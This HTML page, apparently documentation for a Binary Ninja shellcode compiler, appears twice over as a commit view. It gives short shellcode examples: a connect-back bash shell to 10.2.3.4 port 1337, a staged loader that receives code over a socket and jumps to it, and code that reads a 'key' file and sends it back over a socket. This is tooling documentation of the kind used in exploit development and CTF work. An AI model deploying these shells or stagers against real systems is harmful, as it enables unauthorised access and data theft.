binaryninja/personal/scc-docs/examples.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
    "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="generator" content="AsciiDoc 8.6.10" />
<title>Shellcode Compiler Examples</title>
<link rel="stylesheet" href="lib/v35.css" type="text/css" />
<link rel="stylesheet" href="lib/layout2v35.css" type="text/css" />
<script type="text/javascript" src="lib/asciidoc.js"></script>
<script type="text/javascript">
/*<![CDATA[*/
asciidoc.install(2);
/*]]>*/
</script>
</head>
<body>
<div id="layout-menu-box">
<div id="layout-menu">
  <div>&#187;<a href="index.html">Home</a></div>
  <div>&#187;<a href="examples.html">Examples</a></div>
  <div>&#187;<a href="scc.html">Invocation</a></div>
  <div>&#187;<a href="runtime.html">Runtime&nbsp;Library</a></div>
  <div>&#187;<a href="python.html">Python&nbsp;Bindings</a></div>
  <div>&#187;<a href="issues.html">Known&nbsp;Issues</a></div>
</div>
</div>
<div id="layout-content-box">
<div id="layout-banner">
  <div id="layout-title">Shellcode Compiler</div>
  <div id="layout-description">A custom shellcode compiler for Binary Ninja</div>
</div>
<div id="layout-content">
<div id="header">
<h1>Shellcode Compiler Examples</h1>
<div id="toc">
  <div id="toctitle">Table of Contents</div>
  <noscript><p><b>JavaScript must be enabled in your browser to display the table of contents.</b></p></noscript>
</div>
</div>
<div id="content">
<div id="preamble">
<div class="sectionbody">
<div class="paragraph"><p>The following are short examples of how to use the Shellcode Compiler to solve
common shellcoding tasks.</p></div>
</div>
</div>
<div class="sect1">
<h2 id="_resolve_and_call_windows_functions">Resolve and call Windows functions</h2>
<div class="sectionbody">
<div class="paragraph"><p>SCC supports the ability to dynamically resolve and call windows functions for
you with the right syntax. The following simple example is a popup displaying
hello world using MessageBoxA.</p></div>
<div class="listingblock">
<div class="content monospaced">
<pre>int __stdcall MessageBoxA(HANDLE hwnd, const char* msg, const char* title, uint32_t flags) __import("user32");

int main()
{
    MessageBoxA(NULL, "Hello", "Hello World.", 0);
    return 0;
}</pre>
</div></div>
</div>
</div>
<div class="sect1">
<h2 id="_connect_back_shell">Connect-back Shell</h2>
<div class="sectionbody">
<div class="paragraph"><p>The following code will connect to 10.2.3.4 on port 1337 with an interactive
bash session.</p></div>
<div class="listingblock">
<div class="content monospaced">
<pre>void main()
{
        int s = create_tcp4_connection(IPV4_ADDR(10, 2, 3, 4), 1337);
        redirect_io(s);
        interactive_bash();
}</pre>
</div></div>
</div>
</div>
<div class="sect1">
<h2 id="_passing_socket_descriptor_from_previous_stage">Passing socket descriptor from previous stage</h2>
<div class="sectionbody">
<div class="paragraph"><p>The main() function can take arguments, which are to be passed on the stack from
right to left (C calling convention).  When you transition to this shellcode, use
a standard call instruction with the socket pushed onto the stack.</p></div>
<div class="listingblock">
<div class="content monospaced">
<pre>void main(int sock)
{
        redirect_io(sock);
        interactive_bash();
}</pre>
</div></div>
</div>
</div>
<div class="sect1">
<h2 id="_staged_shellcode">Staged shellcode</h2>
<div class="sectionbody">
<div class="paragraph"><p>You can use the computed goto syntax to transition to a new, larger shellcode buffer.
The following example allocates a new buffer on the heap for shellcode of an arbitrary size.</p></div>
<div class="listingblock">
<div class="content monospaced">
<pre>void main(int sock)
{
        int len;
        recv(sock, &amp;len, 4, 0);

        void* code = malloc(len);
        recv_all(sock, code, len, 0);
        goto *code;
}</pre>
</div></div>
</div>
</div>
<div class="sect1">
<h2 id="_read_a_file">Read a file</h2>
<div class="sectionbody">
<div class="paragraph"><p>The following shellcode reads a small file called <span class="monospaced">key</span> and sends it back over file
descriptor 4, which is typically the incoming connection on a forking server.</p></div>
<div class="listingblock">
<div class="content monospaced">
<pre>void main()
{
        char data[64];
        int fd = open("key", O_RDONLY, 0);
        int len = read(fd, data, 64);
        write(4, data, len);
}</pre>
</div></div>
</div>
</div>
</div>
<div id="footnotes"><hr /></div>
</div>
</div>
</body>
</html>
Added binja personal 2019-04-03 14:46:40 +01:00			`<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"`
			`"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">`
			`<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">`
			`<head>`
			`<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />`
			`<meta name="generator" content="AsciiDoc 8.6.10" />`
			`<title>Shellcode Compiler Examples</title>`
			`<link rel="stylesheet" href="lib/v35.css" type="text/css" />`
			`<link rel="stylesheet" href="lib/layout2v35.css" type="text/css" />`
			`<script type="text/javascript" src="lib/asciidoc.js"></script>`
			`<script type="text/javascript">`
			`/<![CDATA[/`
			`asciidoc.install(2);`
			`/]]>/`
			`</script>`
			`</head>`
			`<body>`
			`<div id="layout-menu-box">`
			`<div id="layout-menu">`
			`<div>»<a href="index.html">Home</a></div>`
			`<div>»<a href="examples.html">Examples</a></div>`
			`<div>»<a href="scc.html">Invocation</a></div>`
			`<div>»<a href="runtime.html">Runtime Library</a></div>`
			`<div>»<a href="python.html">Python Bindings</a></div>`
			`<div>»<a href="issues.html">Known Issues</a></div>`
			`</div>`
			`</div>`
			`<div id="layout-content-box">`
			`<div id="layout-banner">`
			`<div id="layout-title">Shellcode Compiler</div>`
			`<div id="layout-description">A custom shellcode compiler for Binary Ninja</div>`
			`</div>`
			`<div id="layout-content">`
			`<div id="header">`
			`<h1>Shellcode Compiler Examples</h1>`
			`<div id="toc">`
			`<div id="toctitle">Table of Contents</div>`
			`<noscript><p><b>JavaScript must be enabled in your browser to display the table of contents.</b></p></noscript>`
			`</div>`
			`</div>`
			`<div id="content">`
			`<div id="preamble">`
			`<div class="sectionbody">`
			`<div class="paragraph"><p>The following are short examples of how to use the Shellcode Compiler to solve`
			`common shellcoding tasks.</p></div>`
			`</div>`
			`</div>`
			`<div class="sect1">`
			`<h2 id="_resolve_and_call_windows_functions">Resolve and call Windows functions</h2>`
			`<div class="sectionbody">`
			`<div class="paragraph"><p>SCC supports the ability to dynamically resolve and call windows functions for`
			`you with the right syntax. The following simple example is a popup displaying`
			`hello world using MessageBoxA.</p></div>`
			`<div class="listingblock">`
			`<div class="content monospaced">`
			`<pre>int __stdcall MessageBoxA(HANDLE hwnd, const char* msg, const char* title, uint32_t flags) __import("user32");`

			`int main()`
			`{`
			`MessageBoxA(NULL, "Hello", "Hello World.", 0);`
			`return 0;`
			`}</pre>`
			`</div></div>`
			`</div>`
			`</div>`
			`<div class="sect1">`
			`<h2 id="_connect_back_shell">Connect-back Shell</h2>`
			`<div class="sectionbody">`
			`<div class="paragraph"><p>The following code will connect to 10.2.3.4 on port 1337 with an interactive`
			`bash session.</p></div>`
			`<div class="listingblock">`
			`<div class="content monospaced">`
			`<pre>void main()`
			`{`
			`int s = create_tcp4_connection(IPV4_ADDR(10, 2, 3, 4), 1337);`
			`redirect_io(s);`
			`interactive_bash();`
			`}</pre>`
			`</div></div>`
			`</div>`
			`</div>`
			`<div class="sect1">`
			`<h2 id="_passing_socket_descriptor_from_previous_stage">Passing socket descriptor from previous stage</h2>`
			`<div class="sectionbody">`
			`<div class="paragraph"><p>The main() function can take arguments, which are to be passed on the stack from`
			`right to left (C calling convention). When you transition to this shellcode, use`
			`a standard call instruction with the socket pushed onto the stack.</p></div>`
			`<div class="listingblock">`
			`<div class="content monospaced">`
			`<pre>void main(int sock)`
			`{`
			`redirect_io(sock);`
			`interactive_bash();`
			`}</pre>`
			`</div></div>`
			`</div>`
			`</div>`
			`<div class="sect1">`
			`<h2 id="_staged_shellcode">Staged shellcode</h2>`
			`<div class="sectionbody">`
			`<div class="paragraph"><p>You can use the computed goto syntax to transition to a new, larger shellcode buffer.`
			`The following example allocates a new buffer on the heap for shellcode of an arbitrary size.</p></div>`
			`<div class="listingblock">`
			`<div class="content monospaced">`
			`<pre>void main(int sock)`
			`{`
			`int len;`
			`recv(sock, &len, 4, 0);`

			`void* code = malloc(len);`
			`recv_all(sock, code, len, 0);`
			`goto *code;`
			`}</pre>`
			`</div></div>`
			`</div>`
			`</div>`
			`<div class="sect1">`
			`<h2 id="_read_a_file">Read a file</h2>`
			`<div class="sectionbody">`
			`<div class="paragraph"><p>The following shellcode reads a small file called <span class="monospaced">key</span> and sends it back over file`
			`descriptor 4, which is typically the incoming connection on a forking server.</p></div>`
			`<div class="listingblock">`
			`<div class="content monospaced">`
			`<pre>void main()`
			`{`
			`char data[64];`
			`int fd = open("key", O_RDONLY, 0);`
			`int len = read(fd, data, 64);`
			`write(4, data, len);`
			`}</pre>`
			`</div></div>`
			`</div>`
			`</div>`
			`</div>`
			`<div id="footnotes"><hr /></div>`
			`</div>`
			`</div>`
			`</body>`
			`</html>`